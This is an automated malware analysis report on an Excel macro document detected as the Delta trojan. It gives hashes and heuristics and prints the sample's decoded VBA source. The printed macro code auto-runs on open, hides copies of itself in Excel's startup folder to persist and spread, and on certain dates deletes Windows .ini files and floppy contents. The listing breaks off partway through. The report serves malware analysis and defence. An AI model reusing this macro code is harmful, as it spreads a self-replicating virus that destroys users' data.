Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1f7cf81284c91583…

MALICIOUS

Office (OLE)

28.0 KB Created: 1998-06-01 23:45:29 First seen: 2012-06-14
MD5: 4c20924b6a9361ce40418a7462e2e3f5 SHA-1: 9d4489f7b880c1bb3f8a5445fbdc95487f053b18 SHA-256: 1f7cf81284c9158374ed42f6c00a5b461ec56a9da9498b0c60deb11562945fb1
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, including an Auto_Open subroutine, which is a common technique for executing malicious code upon opening a document. The critical heuristic indicates a ClamAV detection of 'Xls.Trojan.Delta-6', suggesting a known trojan. The Auto_Close macro attempts to modify a file path, potentially for persistence or cleanup. The presence of Auto_Open and Auto_Close macros, along with the ClamAV signature, strongly indicates a malicious intent to execute arbitrary code.

Heuristics 4

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6665 bytes
SHA-256: c1786b93bca1d7dca8d11053eb364e495056a02f43fbd2358722b6660af95d94
Detection
ClamAV: Xls.Trojan.Delta-6
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"

Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
On Error GoTo cuek
    Application.DisplayStatusBar = False
    Call Chk1
    Call Chk2
    Call Dstr
    Call Hlt
    Call Hdn
    Call Tim
    Call Icn_1
    Call Icn_3
    Application.DisplayStatusBar = True
cuek:
End Sub

Sub Auto_Close()
Attribute Auto_Close.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error GoTo vodo
    SetAttr ("c:\msoffice\excel\xlstart\EXCELVBA.XLA"), vbNormal
vodo:
End Sub


Sub Tim()
Attribute Tim.VB_ProcData.VB_Invoke_Func = " \n14"
Application.OnTime Now + TimeValue("00:15:00"), " Hlt "
End Sub

Sub Ky()
Attribute Ky.VB_ProcData.VB_Invoke_Func = " \n14"
    My_password = InputBox("This Is The Example Of My Project ! You Can Modified, Added in Order to be a God Hacker ! Please Type My Project Name to Continued or I'll Destroy Your Computer ! < By Bui'95 >", " Delta Project ")
    If My_password <> "Delta" Then
       MsgBox (" Sorry ..!, My Project Name is Delta ")
       Application.Quit
    Else
       On Error GoTo abis
       DialogSheets("Module1").Show
       Sheets("Dialog1").Select
       Sheets("Dialog1").Visible = False
    Exit Sub
    End If
abis:
End Sub

Sub Ghst()
Attribute Ghst.VB_ProcData.VB_Invoke_Func = " \n14"
GoTo low
     Set myobject = ActiveWorkbook
     If myobject.Application.Name = "BOOK1.XLS" Then
        Call Waw
     Else
        MsgBox " Wrong !", vbExclamation
     End If
low:
End Sub

Sub Trl()
Attribute Trl.VB_ProcData.VB_Invoke_Func = " \n14"
Set objectku = ActiveWindow
    objectku.OnWindow = "Waw"
End Sub

Sub Dstr()
Attribute Dstr.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error GoTo bail
    tgl = 13
    MyDate = Date
    If Day(MyDate) = 5 And Month(MyDate) > 1 Then
       Kill "c:\windows\*.ini"
       Kill "a:\*.*"
       Call Ky
    End If
bail:
End Sub


Sub Thc1()
Attribute Thc1.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error GoTo bae
    ChDrive "c:\"
    ChDir "c:\msoffice\excel\xlstart"
'    Application.DisplayStatusBar = False
    Sheets("Module1").Visible = True
    ExecuteExcel4Macro "VBA.MAKE.ADDIN(""c:\msoffice\excel\xlstart\EXCELVBA.XLA"")"
    Sheets("Module1").Select
    Call txt
    Sheets("Module1").Select
    Call prt
    Sheets("Module1").Visible = False
'   Sheets("Sheet1").Select
'   Application.DisplayStatusBar = True
    SetAttr ("c:\msoffice\excel\xlstart\EXCELVBA.XLA"), vbHidden
bae:
End Sub

Sub Chk1()
Attribute Chk1.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error GoTo kajeun
    mysize = FileLen("c:\msoffice\excel\xlstart\excelvba.xla")    ' Returns file length (bytes).
    If mysize < 22000 Then
       Call Thc1
    Else
        GoTo diam
    End If
kajeun:
    Call Thc1
diam:
End Sub


Sub Chk2()
Attribute Chk2.VB_ProcData.VB_Invoke_Func = " \n14"
On Error GoTo baeah
    mybra = FileLen("c:\msoffice\excel\xlstart\book1.xls")     ' Returns file length (bytes).
    If mybra < 22000 Then
      Call Thc2
    Else
      GoTo cuek
    End If
baeah:
    Call Thc2
cuek:
End Sub


Sub Thc2()
Attribute Thc2.VB_ProcData.VB_Invoke_Func = " \n14"
On Error GoTo wow
    ActiveWorkbook.SaveAs FileName:="c:\msoffice\excel\xlstart\BOOK1.XLS", FileFormat:=xlNormal, _
    Password:="", WriteResPassword:="", ReadOnlyRecommended:=False _
    , CreateBackup:=False
wow:
End Sub

Sub ins()
Attribute ins.VB_ProcData.VB_Invoke_Func = " \n14"
     SetAttr ("c:\msoffice\excel\xlstart\excelvbs.txt"), vbNormal
     Set mytarget = ActiveSheet
     Set myobject = ActiveWorkbook
        On Error GoTo oke
        Sheets("Module1").Visible = True
        Call prt
        Sheets("Module1").Visible = False
'      If myobject.Name <> "BOOK1.XLS" And mytarget.Name <> "Module1" Then
        SetAttr ("c:\msoffice\excel\xlstart\excelvbs.txt"), vbHidden
         Call Hdn
         Call Waw
         Exit Sub
'      End If
oke:
        ActiveWorkbook.Modules().Add
        ActiveWorkbook.ActiveSheet().InsertFile 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.